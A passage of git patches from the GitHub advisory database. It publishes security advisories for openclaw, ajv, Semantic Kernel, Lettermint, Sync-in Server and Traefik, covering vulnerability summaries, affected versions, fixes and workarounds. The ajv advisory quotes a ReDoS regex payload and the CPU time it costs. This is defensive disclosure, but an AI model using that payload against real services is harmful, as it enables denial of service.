Filter](https://learn.microsoft.com/en-us/semantic-kernel/concepts/enterprise-readiness/filters?pivots=programming-language-csharp#function-invocation-filter) which checks the arguments being passed to any calls to `DownloadFileAsync ` or `UploadFileAsync` and ensures the provided `localFilePath` is allow listed.\n\n### References\n_Are there any links users can visit to find out more?_\n- [Sample showing safe use of the CodeInterpreterPlugin](https://github.com/microsoft/semantic-kernel/blob/main/dotnet/samples/Demos/CodeInterpreterPlugin/Program.cs#L61-L64)\n- [PR to Add file upload security controls to SessionsPythonPlugin](https://github.com/microsoft/semantic-kernel/pull/13478/changes#diff-88d3cacba2bfa84eef8f2aa171b34f9940338cbb784a3ffc49f5fe3af1b8943d)", + "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nAn Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`.\nDevelopers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\nThe problem has been fixed in [Microsoft.SemanticKernel.Plugins.Core version 1.71.0](https://www.nuget.org/packages/Microsoft.SemanticKernel.Plugins.Core/1.71.0). Users should upgrade to version 1.71.0 or higher.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\nUsers can create a [Function Invocation Filter](https://learn.microsoft.com/en-us/semantic-kernel/concepts/enterprise-readiness/filters?pivots=programming-language-csharp#function-invocation-filter) which checks the arguments being passed to any calls to `DownloadFileAsync ` or `UploadFileAsync` and ensures the provided `localFilePath` is allow listed.\n\n### References\n_Are there any links users can visit to find out more?_\n- [Sample showing safe use of the CodeInterpreterPlugin](https://github.com/microsoft/semantic-kernel/blob/main/dotnet/samples/Demos/CodeInterpreterPlugin/Program.cs#L61-L64)\n- [PR to Add file upload security controls to SessionsPythonPlugin](https://github.com/microsoft/semantic-kernel/pull/13478/changes#diff-88d3cacba2bfa84eef8f2aa171b34f9940338cbb784a3ffc49f5fe3af1b8943d)", "severity": [ { "type": "CVSS_V3", From 1f8057813508107b0f29ae9307999c87d6e3105d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 19:28:19 +0000 Subject: [PATCH 17/77] Publish Advisories GHSA-4564-pvr2-qq4h GHSA-jfv4-h8mc-jcp8 --- .../2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json | 6 ++++-- .../2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json | 6 ++++-- 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json index 48068a265fa55..6b68425cd0bac 100644 --- a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json +++ b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-4564-pvr2-qq4h", - "modified": "2026-02-18T17:39:00Z", + "modified": "2026-02-20T19:26:53Z", "published": "2026-02-18T17:39:00Z", - "aliases": [], + "aliases": [ + "CVE-2026-27487" + ], "summary": "OpenClaw: Prevent shell injection in macOS keychain credential write", "details": "## Summary\nOn macOS, the Claude CLI keychain credential refresh path constructed a shell command to write the updated JSON blob into Keychain via `security add-generic-password -w ...`. Because OAuth tokens are user-controlled data, this created an OS command injection risk.\n\nThe fix avoids invoking a shell by using `execFileSync(\"security\", argv)` and passing the updated keychain payload as a literal argument.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Platform: macOS only\n- Affected versions: `<= 2026.2.13`\n\n## Fix\n- Patched version: `>= 2026.2.14` (next release)\n- Fix PR: #15924\n- Fix commits (merged to `main`):\n - `9dce3d8bf83f13c067bc3c32291643d2f1f10a06`\n - `66d7178f2d6f9d60abad35797f97f3e61389b70c`\n - `b908388245764fb3586859f44d1dff5372b19caf`\n\nThanks @aether-ai-agent for reporting.", "severity": [ diff --git a/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json index 95b14dd073959..176c4fd9a0cb9 100644 --- a/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json +++ b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-jfv4-h8mc-jcp8", - "modified": "2026-02-18T17:41:09Z", + "modified": "2026-02-20T19:26:42Z", "published": "2026-02-18T17:41:09Z", - "aliases": [], + "aliases": [ + "CVE-2026-27486" + ], "summary": "OpenClaw: Process Safety - Unvalidated PID Kill via SIGKILL in Process Cleanup", "details": "## Summary\n\nOpenClaw CLI process cleanup used system-wide process enumeration and pattern matching to terminate processes without verifying they were owned by the current OpenClaw process. On shared hosts, unrelated processes could be terminated if they matched the pattern.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `< 2026.2.14` (including the latest published version `2026.2.13`)\n- Fixed: `2026.2.14` (planned next release)\n\n## Details\n\nThe CLI runner cleanup helpers could kill processes matched by command-line patterns without validating process ownership.\n\n## Fix\n\nProcess cleanup is now scoped to owned processes only by filtering to direct child PIDs of the current process (`ppid == process.pid`) before sending signals.\n\nHardening follow-ups:\n- Prefer graceful termination for resume cleanup (`SIGTERM`, then `SIGKILL` fallback).\n- Reduce false negatives from `ps` argv truncation by preferring wide output (`ps -axww`) with a fallback.\n- Tighten command-line token matching to avoid substring matches.\n\n## Fix Commit(s)\n\n- 6084d13b956119e3cf95daaf9a1cae1670ea3557\n- eb60e2e1b213740c3c587a7ba4dbf10da620ca66\n\n## Release Process Note\n\nThis advisory is pre-set with patched version `2026.2.14`. After `2026.2.14` is published to npm, the remaining step should be to publish this advisory.\n\nThanks @aether-ai-agent for reporting.", "severity": [ From 4d1cb89f6b1aa5d7e25bf08f4995b3825157a438 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 19:57:35 +0000 Subject: [PATCH 18/77] Publish Advisories GHSA-8v38-pw62-9cw2 GHSA-rqff-837h-mm52 --- .../2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json | 4 ++-- .../2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json index 6386bf81eb90a..fb54a9073e854 100644 --- a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json +++ b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8v38-pw62-9cw2", - "modified": "2025-12-20T03:15:43Z", + "modified": "2026-02-20T19:56:16Z", "published": "2022-02-18T00:00:33Z", "aliases": [ "CVE-2022-0639" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.5.7" diff --git a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json index 90fa858d67a89..efd0a189e3e1a 100644 --- a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json +++ b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rqff-837h-mm52", - "modified": "2022-02-24T14:00:06Z", + "modified": "2026-02-20T19:56:07Z", "published": "2022-02-15T00:02:46Z", "aliases": [ "CVE-2022-0512" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "0.1.0" }, { "fixed": "1.5.6" From c06dd00cac4f2bd9c0126059ebfc4a33c0a1590e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:00:57 +0000 Subject: [PATCH 19/77] Publish GHSA-2g4f-4pwh-qvx6 --- .../GHSA-2g4f-4pwh-qvx6.json | 33 +++++++++++++++++-- 1 file changed, 30 insertions(+), 3 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json index de94b1ac5c5f9..b2ed54fec1747 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json +++ b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-2g4f-4pwh-qvx6", - "modified": "2026-02-17T18:10:29Z", + "modified": "2026-02-20T20:59:11Z", "published": "2026-02-11T21:30:39Z", "aliases": [ "CVE-2025-69873" ], - "summary": "ajv has ReDoS when using $data option", + "summary": "ajv has ReDoS when using `$data` option", "details": "ajv (Another JSON Schema Validator) through version 8.17.1 is vulnerable to Regular Expression Denial of Service (ReDoS) when the `$data` option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax (`$data` reference), which is passed directly to the JavaScript `RegExp()` constructor without validation. An attacker can inject a malicious regex pattern (e.g., `\\\"^(a|a)*$\\\"`) combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with `$data`: true for dynamic schema validation.", "severity": [ { @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "7.0.0-alpha.0" }, { "fixed": "8.18.0" @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ajv" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.14.0" + } + ] + } + ] } ], "references": [ @@ -44,6 +63,10 @@ "type": "WEB", "url": "https://github.com/ajv-validator/ajv/pull/2586" }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/pull/2588" + }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/commit/720a23fa453ffae8340e92c9b0fe886c54cfe0d5" @@ -56,6 +79,10 @@ "type": "PACKAGE", "url": "https://github.com/ajv-validator/ajv" }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/releases/tag/v6.14.0" + }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/releases/tag/v8.18.0" From abeec1b748ed5f9a7ae181c9b238abe5696c8153 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:03:57 +0000 Subject: [PATCH 20/77] Publish GHSA-wh94-p5m6-mr7j --- .../GHSA-wh94-p5m6-mr7j.json | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json diff --git a/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json b/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json new file mode 100644 index 0000000000000..d50dfe80084d3 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh94-p5m6-mr7j", + "modified": "2026-02-20T21:02:32Z", + "published": "2026-02-20T21:02:31Z", + "aliases": [ + "CVE-2026-27484" + ], + "summary": "OpenClaw Discord moderation authorization used untrusted sender identity in tool-driven flows", + "details": "## Overview\n\nDiscord moderation action handling (`timeout`, `kick`, `ban`) used sender identity from request parameters in tool-driven flows, instead of trusted runtime sender context.\n\n## Impact\n\nIn setups where Discord moderation actions are enabled and the bot has the necessary guild permissions, a non-admin user could request moderation actions by spoofing sender identity fields.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Latest published affected version (as of 2026-02-19): `2026.2.17`\n- Affected range: `<=2026.2.17`\n- Fixed in planned next release: `2026.2.18`\n\n## Fix\n\n- Moderation authorization now uses trusted sender context (`requesterSenderId`) instead of untrusted action params.\n- Added permission checks for required guild capabilities per action.\n\n## Fix Commit(s)\n\n- `775816035ecc6bb243843f8000c9a58ff609e32d`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.18" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wh94-p5m6-mr7j" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/775816035ecc6bb243843f8000c9a58ff609e32d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.19" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:02:31Z", + "nvd_published_at": null + } +} \ No newline at end of file From 4892a038f0ee27842948b4583640b54736f1fbb9 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:07:50 +0000 Subject: [PATCH 21/77] Publish GHSA-r6h2-5gqq-v5v6 --- .../GHSA-r6h2-5gqq-v5v6.json | 76 +++++++++++++++++++ 1 file changed, 76 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json diff --git a/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json b/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json new file mode 100644 index 0000000000000..82b927d19e9a8 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json @@ -0,0 +1,76 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r6h2-5gqq-v5v6", + "modified": "2026-02-20T21:05:45Z", + "published": "2026-02-20T21:05:45Z", + "aliases": [ + "CVE-2026-27485" + ], + "summary": "OpenClaw: Reject symlinks in local skill packaging script", + "details": "## Vulnerability\n\n`skills/skill-creator/scripts/package_skill.py` (a local helper script used when authors package skills) previously followed symlinks while building `.skill` archives.\n\nIf an author runs this script on a crafted local skill directory containing symlinks to files outside the skill root, the resulting archive can include unintended file contents.\n\n## Severity and Exposure\n\n- **Severity: Low**\n- **Execution context:** local/manual workflow only (skill author packaging step)\n- **No remote trigger:** this is not reachable via normal OpenClaw gateway/chat runtime paths\n- **No extraction Zip Slip in this finding:** this issue is limited to packaging-time symlink following\n\n## Impact\n\n- Potential unintentional disclosure of local files from the packaging machine into a generated `.skill` artifact.\n- Requires local execution of the packaging script on attacker-controlled skill contents.\n\n## Affected Components\n\n- `skills/skill-creator/scripts/package_skill.py`\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Latest published version during triage: `2026.2.17`\n- Vulnerable version range: `<= 2026.2.17`\n- Planned patched version (next release): `2026.2.18`\n\n## Remediation\n\n- Reject symlinks during skill packaging.\n- Add regression tests for symlink file and symlink directory cases.\n- Update packaging guidance to document the symlink restriction.\n\n## Fix Commit(s)\n\n- `c275932aa4230fb7a8212fe1b9d2a18424874b3f`\n- `ee1d6427b544ccadd73e02b1630ea5c29ba9a9f0`\n\n## Related PR\n\n- https://github.com/openclaw/openclaw/pull/20796\n\n## Release Process Note\n\n`patched_versions` is pre-set to the planned next release (`2026.2.18`). Once npm `openclaw@2026.2.18` is published, this advisory is ready to publish without additional edits.\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.18" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r6h2-5gqq-v5v6" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/20796" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/c275932aa4230fb7a8212fe1b9d2a18424874b3f" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/ee1d6427b544ccadd73e02b1630ea5c29ba9a9f0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.19" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-61" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:05:45Z", + "nvd_published_at": null + } +} \ No newline at end of file From ef3ccde7aff8ff9e8ded5d57c650218edae6738c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:14:35 +0000 Subject: [PATCH 22/77] Publish GHSA-w45g-5746-x9fp --- .../GHSA-w45g-5746-x9fp.json | 68 +++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json diff --git a/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json b/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json new file mode 100644 index 0000000000000..6ea03cb2a2cf4 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w45g-5746-x9fp", + "modified": "2026-02-20T21:13:03Z", + "published": "2026-02-20T21:13:03Z", + "aliases": [ + "CVE-2026-27488" + ], + "summary": "OpenClaw hardened cron webhook delivery against SSRF", + "details": "## Affected Packages / Versions\n\n- `openclaw` npm package versions `<= 2026.2.17`.\n\n## Vulnerability\nCron webhook delivery in `src/gateway/server-cron.ts` used `fetch()` directly, so webhook targets could reach private/metadata/internal endpoints without SSRF policy checks.\n\n## Fix Commit(s)\n- `99db4d13e`\n- `35851cdaf`\n\nThanks @Adam55A-code for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.17" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w45g-5746-x9fp" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/99db4d13e5c139883ef0def9ff963e9273179655" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.19" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:13:03Z", + "nvd_published_at": null + } +} \ No newline at end of file From caae1cc53857d7e39c160f58164e7cf7450a9def Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:16:57 +0000 Subject: [PATCH 23/77] Publish Advisories GHSA-49pc-8936-wvfp GHSA-9jmq-xgjm-p8c2 GHSA-gv8r-9rw9-9697 GHSA-q5fh-2hc8-f6rq GHSA-rcqw-6466-3mv7 GHSA-9jmq-xgjm-p8c2 --- .../GHSA-49pc-8936-wvfp.json | 65 ++++++++++++ .../GHSA-9jmq-xgjm-p8c2.json | 69 +++++++++++++ .../GHSA-gv8r-9rw9-9697.json | 99 +++++++++++++++++++ .../GHSA-q5fh-2hc8-f6rq.json | 69 +++++++++++++ .../GHSA-rcqw-6466-3mv7.json | 65 ++++++++++++ .../GHSA-9jmq-xgjm-p8c2.json | 33 ------- 6 files changed, 367 insertions(+), 33 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-gv8r-9rw9-9697/GHSA-gv8r-9rw9-9697.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-rcqw-6466-3mv7/GHSA-rcqw-6466-3mv7.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json diff --git a/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json new file mode 100644 index 0000000000000..2fed98112dc02 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-49pc-8936-wvfp", + "modified": "2026-02-20T21:14:50Z", + "published": "2026-02-20T21:14:49Z", + "aliases": [ + "CVE-2026-27492" + ], + "summary": "Lettermint Node.js SDK leaks email properties to unintended recipients when client instance is reused", + "details": "### Impact\nEmail properties (such as to, subject, html, text, and attachments) are not reset between sends when a single client instance is reused across multiple .send() calls. This can cause properties from a previous send to leak into a subsequent one, potentially delivering content or recipient addresses to unintended parties. Applications sending emails to different recipients in sequence — such as transactional flows like password resets or notifications — are affected.\n\n### Patches\nYes, the issue has been patched. Users should upgrade to v1.5.1 or later.\n\n### Workarounds\nIf upgrading immediately is not possible, instantiate a new client for each send:\n```js\nconst client = new Lettermint({ apiKey: process.env.LETTERMINT_API_KEY });\nawait client.email.to('...').subject('...').html('...').send();\n```\n\nThis ensures no state is carried over between sends.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "lettermint" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/lettermint/lettermint-node/security/advisories/GHSA-49pc-8936-wvfp" + }, + { + "type": "WEB", + "url": "https://github.com/lettermint/lettermint-node/commit/24a17acbc2429c5eb30391f9df3dc0ea7aaf4de1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/lettermint/lettermint-node" + }, + { + "type": "WEB", + "url": "https://github.com/lettermint/lettermint-node/blob/main/CHANGELOG.md#151-2026-02-20" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-488" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:14:49Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json b/advisories/github-reviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json new file mode 100644 index 0000000000000..d684b5c64310b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9jmq-xgjm-p8c2", + "modified": "2026-02-20T21:15:36Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-67438" + ], + "summary": "Sync-in Server has a stored cross-site scripting (XSS) vulnerability", + "details": "A Stored Cross-Site Scripting (XSS) vulnerability in Sync-in Server before 1.9.3 allows an authenticated attacker to execute arbitrary JavaScript in a victim's browser. By uploading a crafted SVG file containing a malicious payload, an attacker can access and exfiltrate sensitive information, including the user's session cookies.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@sync-in/server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.9.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67438" + }, + { + "type": "WEB", + "url": "https://github.com/Sync-in/server/commit/a6276d067725637310e4e83a3eee337aae81f439" + }, + { + "type": "WEB", + "url": "https://gist.github.com/x0root/86db30af91bb0e1707eb7e57a049b6ad" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Sync-in/server" + }, + { + "type": "WEB", + "url": "https://github.com/Sync-in/server/releases/tag/v1.9.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:15:36Z", + "nvd_published_at": "2026-02-20T16:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-gv8r-9rw9-9697/GHSA-gv8r-9rw9-9697.json b/advisories/github-reviewed/2026/02/GHSA-gv8r-9rw9-9697/GHSA-gv8r-9rw9-9697.json new file mode 100644 index 0000000000000..738d3df51f1c8 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-gv8r-9rw9-9697/GHSA-gv8r-9rw9-9697.json @@ -0,0 +1,99 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gv8r-9rw9-9697", + "modified": "2026-02-20T21:14:27Z", + "published": "2026-02-20T21:14:27Z", + "aliases": [], + "summary": "Traefik affected by TLS ClientAuth Bypass on HTTP/3", + "details": "### Summary\n\nThere is a potential vulnerability in Traefik managing HTTP/3 connections.\n\nMore details in the [CVE-2025-68121](https://nvd.nist.gov/vuln/detail/CVE-2025-68121).\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.37\n- https://github.com/traefik/traefik/releases/tag/v3.6.8\n\n## Workarounds\n\nNo workaround\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/traefik/traefik" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.7.34" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/traefik/traefik/v2" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.11.37" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.11.36" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/traefik/traefik/v3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.6.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.6.7" + } + } + ], + 